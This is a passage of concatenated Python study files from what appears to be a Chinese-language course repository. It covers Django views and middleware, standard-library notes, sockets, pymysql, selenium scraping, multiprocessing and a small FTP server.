models.UserInfo.objects.create_user(**form_obj.cleaned_data, avatar=avatar_obj) res["url"] = "/login/" else: # 数据有问题 res["code"] = 1 res["error"] = form_obj.errors return JsonResponse(res) def change_password(request): ''' 更改密码 首先获取用户名,当用户要改密码的时候让他先输入旧密码,然后在输入两次新密码,当点击提交的时候,会先检查旧密码 是否正确,如果是正确的就检查两次输入的新密码是否正确,如果两次新密码输入正确就保存,然后跳转到登录界面。如果旧密码不正确, 就提示错误。,两次新密码不一致也提示错误 :param request: :return: ''' #获取用户名 user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != <PASSWORD>: state = '两次密码不一致' return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(<PASSWORD>) user.save() return redirect("/login/") else: state = '原始密码不对' return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) <file_sep>/day5/预习.py ##json模块 import json # #dumps 将字典转换成字符串 # dic ={'k1':'1','k2':'2'} # str=json.dumps(dic) # print(str) # # list_dic = [1,['a','b','c'],3,{'k1':'v1','k2':'v2'}] # print(json.dumps(list_dic)) # #loads 将字符串转换成字典 # dic1=json.loads(str) # print(type(dic1)) ##dump #dump方法接收一个文件句柄,直接将字典转换成json字符串写入文件 # f = open('json_file','w') # dic = {'k1':'v1','k2':'v2','k3':'v3'} # json.dump(dic,f) # f.close() #load#load方法接收一个文件句柄,直接将文件中的json字符串转换成数据结构返回 # f = open('json_file') # dic2 = json.load(f) # f.close() # print(type(dic2),dic2) ##pickle 用于python特有的类型 和 python的数据类型间进行转换 import pickle #dumps # dic = {'k1':'v1','k2':'v2','k3':'v3'} # str_dic = pickle.dumps(dic) # print(str_dic) ##返回二进制内容 # #loads # dic2 = pickle.loads(str_dic) # print(dic2) #返回字典 import time # struct_time=time.localtime(1000000000) # print(struct_time) # f = open('pickle_file','wb') # pickle.dump(struct_time,f) # f.close() f = open('pickle_file','rb') struct_time2 = pickle.load(f) print(struct_time2.tm_year)<file_sep>/day2/02 int.py v = 11 data = v.bit_length() print (data) ##这个长度就是代表十进制变成二进制之后的长度 ##bool # 真 1 True # 假 0 False <file_sep>/day8/udp_server.py import socket sk=socket.socket(type=socket.SOCK_DGRAM) sk.bind(('127.0.0.1',8899)) while True: msg,addr=sk.recvfrom(1024) print(msg.decode('utf-8'),addr) inp=input('>>>:') if inp=='q':break sk.sendto(inp.encode('utf-8'),addr) #print(msg) sk.close()<file_sep>/复习/函数.py #定义一个函数 def mylen(): s1='hello world' length=0 for i in s1: length=length+1 print(length) mylen() #函数的返回值 # def func1(): # print(11) # print(22) # return # print(333) # print(444) # func1() #没有返回值 # def mylen(): # """计算s1的长度""" # s1 = "hello world" # length = 0 # for i in s1: # length = length+1 # # print(length) # str_len=mylen() # print('str_len:%s'%str_len) #一个返回值 # def mylen(): # """计算s1的长度""" # s1 = "hello world" # length = 0 # for i in s1: # length = length+1 # return length # str_len=mylen() # print('str_len:%s'%str_len) #返回多个值 # s1=(1,2,3,3) # def my_len(): # count = 0 # for i in s1: # count += 1 # return 666,222,count,'老男孩' # print(my_len(),type(my_len())) #返回多个值,用多个变量来接受 # def my_len(): # count = 0 # for i in s1: # count += 1 # return 666,222,count # ret1,ret2,ret3 = my_len() # (666, 222, 19,) # print(ret1) # print(ret2) # print(ret3) #函数的传参 # li = [1, 2, 3, 43, 'fdsa', 'alex'] # s1 = 'fdsgdfkjlgdfgrewioj' # # def my_len(a): # 函数的定义()放的是形式参数,形参 # count = 0 # for i in a: # count += 1 # return count # ret = my_len(li) # 函数的执行() 实际参数,实参 # print(ret) # print(len(s1)) # 实参分为:, #位置参数必须一一对应,按顺序 ''' def func(x,y): print(x,y) func(2,3) ''' #关键字参数,必须一一对应,不分顺序 ''' def func(x,y,z): print(x,y,z) func(y=4,z=2,x=1) ''' #混合参数 ''' def func2(argv1,argv2,argv3): print(argv1,argv2,argv3) func2(2,3,argv3=9) ''' #形参分为: #位置参数,必须一一对应 # def func(y,x): # print(y,x) # func(1,2) #默认参数,必须在位置参数后面 # def register(name,sex='男'): # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write("{} {}\n".format(name,sex)) # register('hu') #动态参数 *args,**kwargs # kwargs接收的只是键值对的参数,并保存在字典中 #args接收除去键值对以外的所有参数,保存成元组形式 # def func2(*args,**kwargs): # print(args) ##打印成元组 # print(kwargs) ##打印成字典 # func2(1,2,2,3,4,5,'alex','老男孩',a='ww',b='qq') #三种参数的和混合使用 # def func3(a,b,*args,sex='男'): ##顺序是 位置参数(关键字),*args ,默认参数 # print(a) # print(b) # print(sex) # print(args) # func3(1,2,'老男孩','alex',sex='女') # def func4(a,b,*args,sex='男',**kwargs): ##位置参数,*args,默认参数,**kwargs # print(a) # print(b) # print(args) # print(sex) # print(kwargs)#= # func4(1,2,3,'alex','aa',sex='女',name='alex') #打散 # def func1(*args,**kwargs): # print(args) # # print(kwargs) # l1 = [1,2,3,4] # l11 = (1,2,3,5) # l2 = ['alex','wusir',4] # func1(*l1,*l2,*l11) ##这个是以元组出现的 # def func1(*args,**kwargs): # # print(args) # print(kwargs) # dic1 = {'name1':'alex'} # dic2 = {'name2':'wusir'} # func1(**dic1,**dic2) ##出来的结果是以字典形式存在的 #函数的命名空间 # name = 'wusir' ##全局命名空间 # age = 12 # def func1(): # name1 = 'bob' ##局部命名空间 # age1 = 34 # return name1 # print(func1()) # print(name) # name1 = 'wusir' # def func1(): # print(name1) # def func2(): # print('xxxxx',name1) # func2() # func1() #查看命名空间 # name1 = 'wusir' # def func1(): # name2 = 'laonanhai' # print(globals()) ##查看全局变量 # print(locals()) ##查看局部变量 # func1() #global声明一个全局变量 # name = 'wusir' # def func1(): # global name ##声明一个全局变量 # name = 'alex' # return # func1() # print(name) ##打印的结果是alex # 对可变数据类型(list,dict,set)可以直接引用不用通过global。 # li = [1,2,3] # dic = {'a':'b'} # # def change(): # li.append('a') # dic['q'] = 'g' # print(dic) # print(li) # change() #nolocal不能修改全局变量 # def func2(): # name1 = 'alex' # print('+',name1)#alex # def inner(): # nonlocal name1 # name1 = 'wusir' # print('*',name1)#wusir # def inner1(): # pass # inner() # print('%',name1)#wusir # func2() #函数名 # #1 可以互相赋值 # def func1(): # print(666) # f1 = func1 # f1() #2 函数名可以当成函数的参数 # def func1(): # print(777) # def func2(argv): # argv() # print(999) # func2(func1) # 打印结果是 777 999 #可以当成容器类数据类型的参数 # def func1(): # print(666) # def func2(): # print(777) # def func3(): # print(888) # ll = [func1,func2,func3] # for i in ll: # i() #分别执行每个函数 #函数名可以当成函数的返回值 # def func1(): # print(666) # def func2(argv): # print(777) # return argv # ret = func2(func1) ##func2执行 并且把func1传给了argv而argv又返回给了ret,所以ret=func1 # ret() #结果是777 666 #闭包 内层函数对外层函数非全局变量的引用,叫做闭包 # def wrapper(): # name1 = '老男孩' # def inner(): # print(name1) # inner() # print(inner.__closure__) ##如果返回是cell是闭包 # wrapper() # # name1 = '老男孩' # def wrapper(): # # def inner(): # print(name1) # inner() # print(inner.__closure__) ##返回none不是闭包 # wrapper() name = 'alex' def wrapper(argv): def inner(): print(argv) inner() print(inner.__closure__) # cell wrapper(name)<file_sep>/cmdb/auto_client - 7 - 资产信息入库/lib/log.py #!/usr/bin/python # -*- coding:utf-8 -*- import logging from config import settings class Logger(object): def __init__(self): self.log_file_path = settings.LOG_FILE_PATH file_handler = logging.FileHandler(self.log_file_path, 'a', encoding='utf-8') file_handler.setFormatter(logging.Formatter(fmt="%(asctime)s - %(name)s - %(levelname)s: %(message)s")) self.logger = logging.Logger('cmdb', level=logging.INFO) self.logger.addHandler(file_handler) def info(self,msg): self.logger.info(msg) def error(self,msg): self.logger.error(msg) logger = Logger()<file_sep>/day2/补充.py l1 = ['alex', 'wusir', 'taibai', 'barry', '老男孩'] #1 # del l1[1::2] # print(l1) # # for i in range(len(l1)): # print(l1) # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # print(i) # 0 1 2 3 # if i % 2 == 1: # del l1[i] # print(l1) # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry'] # print(i) # 0 1 #再循环一个列表时,不要对列表进行删除的动作(改变列表元素的个数动作),会出错 #range 可定制的数字列表 # for i in range(10): # print(i) # for i in range(1,10): # print(i) # for i in range(1,10,2): # print(i) # for i in range(10,1,-1): # print(i) # print(range(10)) # for i in range(len(l1)-1,-1,-1): # if i % 2 == 1: # del l1[i] # print(l1) # dict 再循环字典时,不要改变字典的大小。 # dic = {'k1':'v1','k2':'v2','k3':'v3','r':666} # l1 = [] # for i in dic: # if 'k' in i: # l1.append(i) # # print(l1) # # for i in l1: # del dic[i] # print(dic) #tu 如果元组里面只有一个元素并且没有逗号隔开,那么他的数据类型与该元素一致。 # tu1 = (1) # print(tu1,type(tu1)) # tu2 = ('alex') # print(tu2,type(tu2)) # # tu3 = (['alex',1,2]) # print(tu3,type(tu3))<file_sep>/day15/python连接mysql/mysql_fetchone.py import pymysql # username=input('请输入用户名:') # pwd=input('请输入密码:') #连接数据库 conn = pymysql.connect(host='localhost',user='root',password='123',db='user') #创建游标 cursor=conn.cursor() #增 sql="select * from t1" rows=cursor.execute(sql) # res1=cursor.fetchone() #fetchone查看一行记录 # res2=cursor.fetchone() # res3=cursor.fetchone() # res4=cursor.fetchmany(2)#查看两行,以元祖形式出现 res5=cursor.fetchall()#查看所有记录 # print(res1) # print(res2) # print(res3) # print(res4) print(res5) #提交 conn.commit() #关闭游标 cursor.close() #关闭连接 conn.close() ''' ((1, 'egon', '123'), (2, 'hu', '123'), (3, 'root', '123456'), (4, 'lhf', '12356'), (5, 'eee', '156')) '''<file_sep>/day18/练习/mymiddleware.py ''' 自己定义的中间件 ''' from django.utils.deprecation import MiddlewareMixin from django.shortcuts import HttpResponse,render class MD1(MiddlewareMixin): def process_request(self, request): print("这是md1中的process_request方法") print(id(request)) request.s21 = "好" # return HttpResponse("呵呵1") # return render(request,"weihu.html") # # def process_response(self,request,response): # print("这是md1中的process_response方法") # return response # def process_view(self,request,view_func,view_args,view_kwargs): # print("=" * 120) # # print(view_func.__name__) # 查看名字 # # print(view_func.__doc__) # 查看文本注释 # # view_func(request) # # print("-" * 120) # print("这是md1中的process_view方法") # # return HttpResponse("啦啦") # # def process_template_response(self, request, response): # # # print("这是MD1中的process_template_response方法!") # return response # # # # class MD2(MiddlewareMixin): # def process_request(self, request): # print("这是md2中的process_request方法") # print(id(request)) # request.s21 = "好" # # return HttpResponse("呵呵2") # # def process_response(self, request, response): # print("这是md2中的process_response方法") # return response # # return HttpResponse("MD2-ressponse") # # def process_view(self,request,view_func,view_args,view_kwargs): # print("=" * 120) # # print(view_func.__name__) # # print(view_func.__doc__) # # view_func(request) # # print("-" * 120) # print("这是md2中的process_view方法") # # return HttpResponse("啦啦") # # def process_template_response(self, request, response): # print("这是MD2中的process_template_response方法!") # return response import time D={} class Xianzhi(MiddlewareMixin): def process_request(self,request): ip=request.META.get("PEMOTE_ADDR") now=time.time() if ip not in D: D[ip]=[] # print(D) history=D[ip] print(history) while history and now-history[-1] >10: # 当现在的访问时间跟最早的访问时间相差大于10秒的时候,则删除最早的访问时间 history.pop() if len(history)>=3: return HttpResponse("你在10秒之内访问次数已经超过三次") else: history.insert(0,now) <file_sep>/复习/迭代器和生成器.py # 这两个都是可迭代的,都会取到1,2,3 # lst_iter = [1,2,3].__iter__() # print(lst_iter.__next__()) # print(lst_iter.__next__()) # print(lst_iter.__next__()) # # # for i in [1,2,3]: # print(i) # print(dir({1,2})) # print(dir(123)) # print('__next__' in dir(range(12))) # print(dir(range(12))) #生成器 # 生成器函数的调用不会触发代码的执行,而是会返回一个生成器(迭代器) # 想要生成器函数执行,需要用next # # def cloth_g(num): # for i in range(num): # yield 'cloth%s'%i # # # g = cloth_g(1000) # print(next(g)) # print(next(g)) # print(next(g)) #send # def generator(): # print(123) # content = yield 1 # print('=======',content) # print(456) # yield 2 # # g = generator() # ret = g.__next__() # print('***',ret)#1 # ret = g.send('hello') #send的效果和next一样 # print('***',ret) #send 获取下一个值的效果和next基本一致 #只是在获取下一个值的时候,给上一yield的位置传递一个数据 #使用send的注意事项 # 第一次使用生成器的时候 是用next获取下一个值 # 最后一个yield不能接受外部的值 print([i**2 for i in range(30) if i%3 ==0])<file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/urls.py from django.conf.urls import url,include from web.views import home urlpatterns = [ url(r'^add_user/', home.add_user), url(r'^add_order/', home.add_order), url(r'^user/', home.userlist), url(r'^orderlist/', home.orderlist), ] <file_sep>/day3/函数.py # def fun1(): # print(111) # return # print(3333) # fun1() ##函数的返回值 # s1 = "hello world" # def mylen(): # count = 0 # for i in s1: # count += 1 # return 555,444,count # ret1,ret2,ret3 = mylen() # print(ret1) # print(ret2) # print(ret3) ##函数的传参 # li = [1,2,3,4,'fdss','alex'] # s1 = 'dfdfdfd' # def my_len(a): ##函数的形参,可以随便写 # count = 0 # for i in a: # count += 1 # return count # print(my_len(li)) ##函数的实参 #实参分为:位置参数,关键字参数,混合参数 #位置参数 ##一一对应,按顺序 # def func1 (x,y): # print(x,y) # func1(1,2) # # ##关键字参数 # def func2 (x,y,z): # print(x,y,z) # func2(y=2,x=1,z=3) # # #混合参数 # def func3(argv1,argv2,argv3): # print(argv1) # print(argv2) # print(argv3) # func3(1,2,argv3=4) #形参分为:位置参数,默认参数,动态参数 # 位置参数 一一对应,按顺序来 # def func1(x,y): # print(x,y) # func1(1,2) ##默认参数 # def register(name,sex='男'): # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write("{} {}\n".format(name,sex)) # register('aa') ##动态参数 *args **kwargs # def func2(*args,**kwargs): # print(args) ##打印成元组 # print(kwargs) ##打印成字典 # func2(1,2,2,3,4,5,'alex','老男孩',a='ww',b='qq') #三种参数的排序 # def func3(a,b,*args,sex='男'): ##顺序是 位置参数,*args ,默认参数 # print(a) # print(b) # print(sex) # print(args) # func3(1,2,'老男孩','alex',sex='女') # def func4(a,b,*args,sex='男',**kwargs): ##位置参数,*args,默认参数,**kwargs # print(a) # print(b) # print(args) # print(sex) # print(kwargs) # func4(1,2,3,'alex','aa',sex='女',name='alex') ##打散 # 函数的执行:* 打散功能 def func1(*args,**kwargs): print(args) print(kwargs) l1 = [1,2,3,4] l11 = (1,2,3,4) l2 = ['alex','wusir',4] func1(*l1,*l2,*l11) ##这个是以元组出现的 # def func1(*args,**kwargs): # print(args) # print(kwargs) # dic1 = {'name1':'alex'} # dic2 = {'name2':'wusir'} # func1(**dic1,**dic2) ##出来的结果是以字典形式存在的 <file_sep>/day5/re模块.py import re ret = re.findall('a','abc egon yuan') # 返回所有满足匹配条件的结果,放在列表里 print(ret) ##结果['a', 'a'] ret1 = re.search('\d+','8787abc 97897engo yuan657').group()#函数会在字符串内查找模式匹配,只到找到第一个匹配然后返回一个包含匹配信息的对象,该对象可以 # 通过调用group()方法得到匹配的字符串,如果字符串没有匹配,则返回None。 print(ret1) ##结果 8787 只匹配第一个数字 ret3=re.match('\d+','1abc78797 97897engo yuan657').group()# 同search,不过只能在字符串开始处进行匹配 print(ret3) # #ret4=re.match('a','bca').group() ##这种的就会报错 # # print(ret4) ret5=re.split('[ab]','abcd')#先按'a'分割得到''和'bcd',在对''和'bcd'分别按'b'分割 print(ret5) ##结果['', '', 'cd'] ret6 = re.sub('\d', 'H', 'eva3egon4yuan4', 1)##将数字替换成'H',参数1表示只替换1个 print(ret6) ret7 = re.subn('\d', 'H', 'eva3egon4yuan4')#将数字替换成'H',返回元组(替换的结果,替换了多少次) print(ret7) obj = re.compile('\d{3}') #将正则表达式编译成为一个 正则表达式对象,规则要匹配的是3个数字 ret8 = obj.search('abc123eeee') #正则表达式对象调用search,参数为待匹配的字符串 print(ret8.group()) ret = re.finditer('\d', 'ds3sy4784a') print(ret) print(ret.__next__().group()) print(next(ret).group()) #第二种取值方式 print([i.group()for i in ret]) ##findall优先级 ret = re.findall('www\.(oldboy|baidu)\.com', 'www.oldboy.com') ##这是因为findall会优先把匹配结果组里内容返回,如果想要匹配结果取消优先级 print(ret)##结果是oldboy ret = re.findall('www\.(?:baidu|oldboy)\.com', 'www.oldboy.com') print(ret) # ['www.oldboy.com'] ##split优先级查询 ret = re.split("\d+",'eva3egon4yuan') print(ret) ret = re.split('(\d+)','eva3egon4yuan') print(ret) ##在匹配部分加上()之后所切出的结果是不同的, #没有()的没有保留所匹配的项,但是有()的却能够保留了匹配的项, #这个在某些需要保留匹配部分的使用过程是非常重要的<file_sep>/auto_server/api/urls.py from django.conf.urls import url from . import views urlpatterns=[ url(r'^server.html$',views.server) ]<file_sep>/day7/student_guanlisystem/core/student.py class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class Student(Foo): def __init__(self,name): self.name=name def student(): Operate_lst = [('查看自己的班级', 'show_courses'), ('查看自己的课程', 'create_class'), ]<file_sep>/day26/pearvideo/pearvideo.py #需求,去批量下载梨视频 import requests from selenium import webdriver from selenium.webdriver.chrome.options import Options from lxml import etree import re # 创建一个无头谷歌浏览器 chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--disable-gpu') # 驱动路径 path = r'D:\python21\python\day26\selenium自动化操作\chromedriver_win32\chromedriver.exe' # 创建浏览器对象 browser = webdriver.Chrome(executable_path=path, chrome_options=chrome_options) # 浏览器打开url browser.get(url="http://www.pearvideo.com/category_59") # 让滚轮向下滑动,加载更多的数据执行js js = "window.scrollTo(0,document.body.scrollHeight)" browser.execute_script(js) # 获取页面圆满数据,进行解析 page_text = browser.page_source # page_source可以获得当前浏览器对应的页面数据,不需要用request # 使用xpath去进行解析操作 tree = etree.HTML(page_text) li_list = tree.xpath('//*[@id="categoryList"]/li') # print(li_list) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } for li in li_list: secondPage_url = "http://www.pearvideo.com/" + li.xpath('./div/a/@href')[0] # 对上述url发起请求,获取二级页面的页面数据 page_text = requests.get(url=secondPage_url, headers=headers).text video_url = re.findall('srcUrl="(.*?)",', page_text, re.S)[0] #使用正则去匹配url videoData = requests.get(url=video_url, headers=headers).content fileName = video_url.split('/')[-1] with open(fileName, 'wb') as fp: fp.write(videoData) print(fileName + '已经被下载完毕') <file_sep>/day9/进程/事件.py # 事件内部内置了一个标志 # wait 方法 如果这个标志是True,那么wait == pass # wait 方法 如果这个标志是False,那么wait就会陷入阻塞,一直阻塞到标志从False变成True # 一个事件在创建之初 内部的标志默认是False # Flase -> True set() # True -> False clear() # 红绿灯模型 from multiprocessing import Process, Event import time, random def car(e, n): while True: if not e.is_set(): # 进程刚开启,is_set()的值是Flase,模拟信号灯为红色 print('\033[31m红灯亮\033[0m,car%s等着' % n) e.wait() # 阻塞,等待is_set()的值变成True,模拟信号灯为绿色 print('\033[32m车%s 看见绿灯亮了\033[0m' % n) time.sleep(random.randint(3, 6)) if not e.is_set(): #如果is_set()的值是Flase,也就是红灯,仍然回到while语句开始 continue print('车开远了,car', n) break def traffic_lights(e, inverval): while True: time.sleep(inverval) # 先睡3秒 if e.is_set(): # 标志是True print('######', e.is_set()) e.clear() # ---->将is_set()的值设置为False else: # 标志是False e.set() # ---->将is_set()的值设置为True print('***********',e.is_set()) if __name__ == '__main__': e = Event() #e就是事件 t = Process(target=traffic_lights, args=(e, 3)) # 创建一个进程控制红绿灯 for i in range(10): p=Process(target=car,args=(e,i,)) # 创建10个进程控制10辆车 p.start() t.start() print('============》') # 10个进程 模拟车 :车的行走要依靠当时的交通灯 # 交通灯是绿灯 车就走 # 交通灯是红灯 车就停 停到灯变绿 # wait 来等灯 # set clear 来控制灯 <file_sep>/day6/练习.py ''' class 类名: 静态属性 = 123 def 动态属性(self): # 在类中的方法的一个默认的参数,但也只是一个形式参数,约定必须叫self print('-->',self) print(类名.静态属性)#查看静态属性 类名.静态属性=456 print(类名.静态属性) #修改静态属性 类名.静态属性2='abc' #增加静态属性 print(类名.静态属性2) del 类名.静态属性2 #删除静态属性 print(类名.动态属性) 类名.动态属性("我要把1传给动态属性self") #这个1传给了self #print(类名.静态属性2) ''' #类的第二个功能实例化(创造一个具体的对象) ''' class Person:pass alex=Person() #对象=类名() 也叫实例化 print(alex) #对象 print(Person) #类 print(alex.__dict__) #默认是空字典 alex.__dict__['name']='alex' # 给alex对象添加属性 alex.sex='男' #给alex对象添加属性 print(alex.__dict__) ''' ''' class Person: def __init__(self,name,sex,dps,hp): self.name=name self.sex=sex self.dps=dps self.hp=hp def attack(self,dog): # 人打狗 dog.hp-=self.dps print('%s打了%s,%s还剩%s点血'% (self.name,dog.name,dog.name,dog.hp)) class Dog: def __init__(self,name,kind,hp,dps): self.name=name self.kind=kind self.hp=hp self.dps=dps def bite(self,person):#狗咬人 person.hp -= self.dps print('%s咬了%s,%s还剩%s点血'% (self.name,person.name,person.name,person.hp)) alex = Person('alex','男',250,5) ha2 = Dog('小白','藏獒',1000,200) ha2.bite(alex) #alex.attack(ha2) #第一种写法 # 对象名.方法名 相当于调用一个函数,默认把对象名作为第一个参数传入函数 alex调用了attack函数 Person.attack(alex,ha2)#第二种写法 print(ha2.hp) ''' #已知半径计算园的面积 # from math import pi # class Yuan: # def __init__(self,r): # self.r=r # def Yuan_mianji(self): # # return pi *self.r **2 # def Yuan_zc(self): # # return pi * 2*self.r # yuan = Yuan(3) # mj=yuan.Yuan_mianji() # #mj1=Yuan.Yuan_mianji(yuan) # zc=yuan.Yuan_zc() # print('我是面积%s\n我是周长%s'%(mj,zc)) #小练习 # class action: # def __init__(self,name,age,sex,zuo): # self.name=name # self.age=age # self.sex=sex # self.zuo=zuo # def attack(self): # print(self.name,self.age,self.sex,self.zuo) # xm=action('小明,','10岁,','男,','上山去砍柴') # li=action('老李,','50岁,','男,','开车去东北') # xm.attack() # li.attack() #命名空间 # 类有自己的命名空间 # 对象也有自己的命名空间 # 对象能访问类的命名空间 # 类不能访问对象的命名空间 class Person: COUNTRY = ['中国人'] # 静态属性 country = '中国人' def __init__(self,name): self.name = name def eat(self): print('%s在吃泔水'%self.name) alex = Person('alex') egon = Person('egon') # print(alex.name) # print(alex.country) # alex.country='印度人' #这个只是在alex这个对象里面生效 # print(alex.country) # print(egon.country) # print(Person.country) # Person里面的没有改过来 # alex.COUNTRY[0] = '印度人' # 如果是列表就整体都改了 # print(alex.COUNTRY) # print(egon.COUNTRY) # print(Person.COUNTRY) alex.COUNTRY=['印度人'] print(egon.COUNTRY) #中国人 print(Person.COUNTRY) #中国人 print(alex.COUNTRY) ''' #结论 # 在访问变量的时候,都先使用自己命名空间中的,如果自己的空间中没有,再到类的空间中去找 # 在使用对象修改静态变量的过程中,相当于在自己的空间中创建了一个新的变量 # 在类的静态变量的操作中 应该使用类名来直接进行操作 就不会出现乌龙问题 #创建一个类计算创建了多少个实例 # class lei: # count = 0 # def __init__(self): # lei.count +=1 # f1=lei() # # print(lei.count) <file_sep>/day2/集合.py ''' 集合: 无序,不重复的数据类型。它里面的元素必须是可哈希的。但是集合本身是不可哈希的。 1:关系测试。交集并集,子集,差集.... 2,去重。(列表的去重) ''' l1 = [1,1,2,2,3,3,4,5,6,6] ##去除重复 l2 = list(set(l1)) print(l2) #增 set1 = {'alex','wusir','ritian','egon','barry'} set1.add('999') print (set1) set1.update('abc') print (set1) #打印结果是'alex', 'ritian', 'b', '999', 'a', 'c', 'egon', 'barry', 'wusir'} #删 #remove set1.remove('egon') print (set1) # #pop # set1.pop() ##随机删除不能指定 # print (set1) #clear set1.clear() print (set1)<file_sep>/deploy/web/views/depart.py from django.shortcuts import render, HttpResponse, redirect from web.forms.depart import DepartModelForm from web import models from web.utils.pager import Pagination # 分页功能 from web.utils.urls import memory_reverse def depart_list(request): """ 部门列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Department.objects.all().count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) # 调用Pagination类 # 页面上面显示的数据 depart_queryset = models.Department.objects.all()[pager.start:pager.end] return render(request, 'depart_list.html', {'depart_queryset': depart_queryset, 'pager': pager}) def depart_add(request): """ 添加部门 :param request: :return: """ if request.method == 'GET': form = DepartModelForm() return render(request, 'form.html', {'form': form}) form = DepartModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request, 'depart_list')) return render(request, 'form.html', {'form': form}) def depart_edit(request, nid): """ 编辑部门 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Department.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = DepartModelForm(instance=obj) return render(request, 'form.html', {'form': form}) # 带默认值 form = DepartModelForm(data=request.POST, instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request, 'depart_list')) return render(request, 'form.html', {'form': form}) def depart_del(request, nid): """ 删除部门 :param request: :param nid: :return: """ origin = memory_reverse(request, 'depart_list') # 代表的是一个url的地址 if request.method == 'GET': # 如果删除的时候,点取消就返回下面的页面 return render(request, 'delete.html', {'cancel': origin}) # 把origin传到删除页面,从而点取消之后返回相应页面 models.Department.objects.filter(id=nid).delete() return redirect(origin) <file_sep>/day19/CMS/fault_reporting/models.py from django.db import models from django.contrib.auth.models import AbstractUser # Create your models here. class UserInfo(AbstractUser): phone=models.CharField(max_length=11) avatar=models.FileField(upload_to="avatars/",default="avatars/default.png") <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/main_board.py #!/usr/bin/env python # -*- coding:utf-8 -*- import os import traceback from .base import BasePlugin from lib.response import BaseResponse from lib.log import logger class MainBoard(BasePlugin): def win(self, handler, hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): response = BaseResponse() try: if self.debug: from config.settings import BASEDIR output = open(os.path.join(BASEDIR, 'files/board.out'), 'r').read() else: shell_command = "sudo dmidecode -t1" output = handler.cmd(shell_command,hostname) response.data = self.parse(output) except Exception as e: msg = traceback.format_exc() response.status = False response.error = msg logger.error(msg) return response.dict def parse(self, content): result = {} key_map = { 'Manufacturer': 'manufacturer', 'Product Name': 'model', 'Serial Number': 'sn', } for item in content.split('\n'): row_data = item.strip().split(':') if len(row_data) == 2: if row_data[0] in key_map: result[key_map[row_data[0]]] = row_data[1].strip() if row_data[1] else row_data[1] return result<file_sep>/day8/ftp作业/get_server.py import socket import os import json import struct import configparser SHARE_DIR=r'D:\python21\day8\ftp作业\sharedir' user_status = { 'username': None, 'status': False } class FtpServer: def __init__(self,host,port): self.host=host self.port=port self.server=socket.socket() self.server.bind((self.host,self.port)) self.server.listen() def register_login(self): config = configparser.ConfigParser() config.read('userinfo') user = config.sections() while True: print('server start') self.conn, self.client_addr = self.server.accept() print(self.client_addr) while True: ret=json.loads(self.conn.recv(1024).decode('utf-8')) print(ret) username = ret[0] print(username) pwd = ret[1] print(pwd) for i in user: if i == username and config[username]['md5_pwd'] == pwd: self.conn.send('true'.encode('utf-8')) user_status['status'] = True else: self.conn.send('你输入的用户名或密码错误'.encode('utf-8')) self.conn.close() self.server.close() def run(self): print('server starting...') while True: self.conn,self.client_addr=self.server.accept() print(self.client_addr) while True: try: data=self.conn.recv(1024) #params_json.encode('utf-8') if not data:break params=json.loads(data.decode('utf-8')) #params=['get','a.txt'] cmd=params[0] # if hasattr(self,cmd): func=getattr(self,cmd) #对象 func(params) else: print('\033[45mcmd not exists\033[0m') except ConnectionResetError: break self.conn.close() self.server.close() def get(self,params): #params=['get','a.txt'] filename=params[1] #filename='a.txt' filepath=os.path.join(SHARE_DIR,filename) # if os.path.exists(filepath): #1、制作报头 headers = { 'filename': filename, 'md5': '123sxd123x123', 'filesize': os.path.getsize(filepath) } headers_json = json.dumps(headers) headers_bytes = headers_json.encode('utf-8') #2、先发报头的长度 self.conn.send(struct.pack('i',len(headers_bytes))) #3、发送报头 self.conn.send(headers_bytes) #4、发送真实的数据 with open(filepath,'rb') as f: for line in f: self.conn.send(line) def put(self): pass if __name__ == '__main__': server=FtpServer('127.0.0.1',8080) server.register_login() <file_sep>/day4/作业测试.py # cmd = "update name='bob' from userinfo where age=25" # a=cmd.split('from')[0].split()[1].split('=')[1].strip("'") # print(a) # insert = "insert into userinfo ('name','age') values ('jack','23')" # b = insert.split('values')[1].split()[0] # print(b) # b = [i.strip().strip(",") for i in a] # print(b) # b= ['3', 'nezha', '25', '1333235322', 'IT'][1] # print(b) ''' ##查询语句 select id ,name, age from userinfo where age>22 select * from userinfo where age>22 select * from userinfo where age=25 select * from userinfo where phone like 133 ##下面这个不行 select * from userinfo where job=IT ''' ##更改语句 # update name='bob' from userinfo where age=25 # cmd = 'select * from userinfo' # a = cmd.split('from')[0].split()[1:] # if a==['*']: # print('ok') # else: # print('bad') ##删除语句 # left_yuju="delete name='bob' from userinfo where age=25" # # filter_cols = left_yuju.split('from')[0].split()[1].split('=') # print(filter_cols) dic = {'id':['1','2','3','4','5']} b = int(dic.get('id')[-1])+1 # print(b) a = [' 5', 'hnf', '23', '123456789', 'python'] print(type(a[0])) a[0]=b print(a) # with open('userinfo',encoding='utf-8',mode='a')as f1: # for i in a: # f1.write(i)<file_sep>/deploy/web/views/deploy.py import os import shutil import traceback import paramiko from io 